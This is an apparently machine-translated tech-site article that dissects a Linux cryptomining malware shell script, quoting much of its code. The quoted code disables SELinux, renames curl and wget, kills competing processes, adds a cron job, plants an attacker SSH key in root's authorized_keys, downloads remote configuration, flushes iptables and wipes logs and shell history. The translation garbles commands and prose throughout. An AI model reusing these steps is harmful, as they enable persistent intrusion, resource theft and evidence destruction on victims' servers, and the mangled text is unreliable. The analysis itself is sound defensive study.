Shulou(Shulou.com)05/31 Report--

This article introduces the relevant knowledge of "how to write the mining script of the database". In the operation of actual cases, many people will encounter such a dilemma, so let the editor lead you to learn how to deal with these situations. I hope you can read it carefully and be able to achieve something!

01.Code 1

#! / bin/sh

The first line of the script looks like a comment, but it's not. It specifies which SHELL will be used to execute the next script.

Like our commonly used bash, zsh, etc., belong to the superset of sh, this script uses sh as the shell for execution, with better portability.

02.Code 2

Setenforce 0 2 > dev/null echo SELINUX=disabled > / etc/sysconfig/selinux 2 > / dev/null

Setenforce is the selinux firewall configuration command for Linux. Executing setenforce 0 means turning off selinux Firewall. 2 stands for standard error (stderr).

So later, you use a redirector to direct the error output of the command to the / dev/null device. This device is a virtual device, which means doing nothing. Very suitable for doing bad things quietly.

03.Code 3

Sync & & echo 3 > / proc/sys/vm/drop_caches

The script kindly frees us some memory resources in order to get more resources for mining.

As we all know, the Linux system will generate a lot of cache over a long period of time. The way to clean up is to write a number to the drop_caches file, which is usually 3.

The sync command writes all unwritten system buffers to disk, and after execution, you can safely release the cache.

04.Code 4

Crondir='/var/spool/cron/' "$USER" cont= `cat ${crondir} `ssht= `cat / root/.ssh/authorized_ keys`cat 1 > / etc/sysupdates rtdir= "/ etc/sysupdates" bbdir= "/ usr/bin/curl" bbdira= "/ usr/bin/cur" ccdir= "/ usr/bin/wget" ccdira= "/ usr/bin/wge" mv / usr/bin/wget / usr/bin/get mv / usr/bin/xget / usr/bin/get mv / usr/bin/get / usr/bin/wge mv / Usr/bin/curl / usr/bin/url mv / usr/bin/xurl / usr/bin/url mv / usr/bin/url / usr/bin/cur

Yes, the above statements just complete some common operations. It is worth noting that it renames some of our common commands using the mv command.

When carrying out the command, it will seem to be painful to divide into functions. This script has changed some files on the computer and belongs to the category of crime.

In order to reuse some functions, the script abstracts a lot of functions. Let's skip directly to the execution of the main function and take a look at the process.

05.Code 5

The first is the kill_miner_proc function. The code is very long, so it won't all be posted.

Kill_miner_proc () {ps auxf | grep-v grep | grep "mine.moneropool.com" | awk'{print $2}'| xargs kill-9. Pkill-f biosetjenkins pkill-f Loopback... Crontab-r rm-rf / var/spool/cron/*

The field of mining is a field of love and murder. This method first uses a combination of ps, grep and kill to kill the peer mining script, and then stop the peer cron script to eat the black feeling.

In this script, the pkill command is used. This command terminates the process and kicks out the user by the terminal number, which is more violent.

06.Code 6

The next step is the kill_sus_proc function.

Ps axf-o "pid" | while read procid do. Done

Ps plus the o parameter, you can specify the column to output, here only the pid of the process is output, and then use the read function to traverse the procid.

07.Code 7

Ls-l / proc/$procid/exe | grep / tmp if [$?-ne 1] then... Fi

The above is the traversal operation, and we can see the syntax of the if statement. Of which $? Refers to the exit status of the previous command.

0 indicates that there is no error, and any other value indicates an error. -ne means that it is not equal, which means that it can match the string tmp.

08.Code 8

Ps axf-o "pid% cpu" | awk'{if ($2 > = 40.0) print $1}'| while read procid do. Done

Ha ha, there is another cycle traversing above. This time, however, the target is for processes that use more than 40 per cent of CPU. This is a little ruthless: if it affects the process of mine digging, I will die! Should you kill me with anger hot.

09.Code 9

Next, the script performs different actions for different user attributes.

The first is the root user. Determine whether it is a root permission by determining whether a $rtdir file exists.

Chattr-I / etc/sysupdate* chattr-I / etc/config.json* chattr-I / etc/update.sh* chattr-I / root/.ssh/authorized_keys* chattr-I / etc/networkservice

It is also bad enough to use the chattr command to make some important files read-only properties that cannot be changed arbitrarily. Then, operate the cron program to add the script update service to the timing.

This is the following script.

10.Code 10

If [!-f "/ usr/bin/crontab"] then echo "* / 30 * sh / etc/update.sh > / dev/null 2 > & 1" > ${crondir} else [[$cont = ~ "update.sh"]] | | (crontab-l; echo "* / 30 * sh / etc/update.sh > / dev/null 2 > & 1") | crontab-fi

Note that [[$cont = ~ "update.sh"]] this is weird with a small piece of code. [[]] is a command built into shell that supports pattern matching of strings.

When using = ~, it even supports regular expressions of shell, which is excruciatingly powerful. Its output is of type bool, so you can use | | for stitching.

The following single parenthesis (), yes, is a command group. Multiple commands in parentheses are separated by semicolons, and the last command can have no semicolon; the effect is basically the same as `cmd`.

11.Code 11

When you're done with the timing task, you need to configure ssh to log in automatically by appending the public key to the trust list.

Chmod 700 / root/.ssh/ echo > > / root/.ssh/authorized_keys chmod 600 root/.ssh/authorized_keys echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/

12.Code 12

Cao Cao and Cao Cao will be here soon, and the following script uses ``to operate.

Filesize_config= `ls-l / etc/config.json | awk'{print $5} '`if ["$filesize_config"-ne "$config_size"] then pkill-f sysupdate rm / etc/config.json downloads $config_url / etc/config.json $config_url_backup else echo "no need download" fi

Get the size of the configuration file through a series of coquettish operations, and if it is determined that the file size is inconsistent, download a new one. This uses the downloads function.

The function in shell, which looks weird, is passed to the function as if it were a script.

13.Code 13

Downloads $config_url / etc/config.json $config_url_backup

In this sentence, three parameters are passed. Of course, the files have to be downloaded from a remote server. The domain name ends with .de, which proves to be a German domain name, and we know nothing else.

Downloads () {if [- f "/ usr/bin/curl"] then echo $1 $2 http_code= `curl-I-m 10-o / dev/null-s-w% {http_code} $1`if ["$http_code"-eq "200"] then curl-- connect-timeout 10-- retry 100 $1 > $2 elif [" $http_code "- eq" 405 "] then curl-- connect-timeout 10-- retry 100 $1 > $2 Else curl-- connect-timeout 10-- retry 100 $3 > $2 fi elif [- f "/ usr/bin/cur"] then http_code = `cur-I-m 10-o / dev/null-s-w% {http_code} $1`if ["$http_code"-eq "200"] then cur-- connect-timeout 10- -retry 100 $1 > $2 elif ["$http_code"-eq "405"] then cur-- connect-timeout 10-- retry 100 $1 > $2 else cur-- connect-timeout 10-- retry 100 $3 > $2 fi elif [- f "/ usr/bin/wget"] then wget-- timeout=10-- tries=100-O $2 $1 if [$? -ne 0] then wget-timeout=10-- tries=100-O $2 $3 fi elif [- f "/ usr/bin/wge"] then wge-- timeout=10-- tries=100-O $2 $1 if [$?-eq 0] then wge-- timeout=10-- tries=100-O $2 $3 fi fi}

In my opinion, the author of this code is smelly and long, and does not reflect his due level at all. Should be in a hurry, did not think of the reuse of the code, will write so substandard.

As we mentioned above, the script changed the names of several commands, including curl. This command is so powerful that the script author can't help but add a lot of parameters:

-I: used to test http header information.

-m: sets the maximum transfer time.

-o: specifies the file name to keep. This is / dev/null, er, er.

-s: silent mode, nothing is output.

-- connect-timeout: connection timeout.

-- retry: retry times, very ruthless, 100 times.

Without curl? Then use the substitute wget, the routine is the same.

14.Code 14

Then there is a series of similar operations, and finally, a batch of operations on iptables.

Iptables-F iptables-X iptables-An OUTPUT-p tcp-- dport 3333-j DROP iptables-An OUTPUT-p tcp-- dport 5555-j DROP iptables-An OUTPUT-p tcp-- dport 7777-j DROP iptables-An OUTPUT-p tcp-dport 9999-j DROP iptables-I INPUT-s 43.245.222.57-j DROP service iptables reload

15.Code 15

The careful scriptwriter also used the command to clean up the operation log.

This is the end of history-c echo > / var/spool/mail/root echo > / var/log/wtmp echo > / var/log/secure echo > / root/.bash_history "how to write Mining script in Database". Thank you for reading. If you want to know more about the industry, you can follow the website, the editor will output more high-quality practical articles for you!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.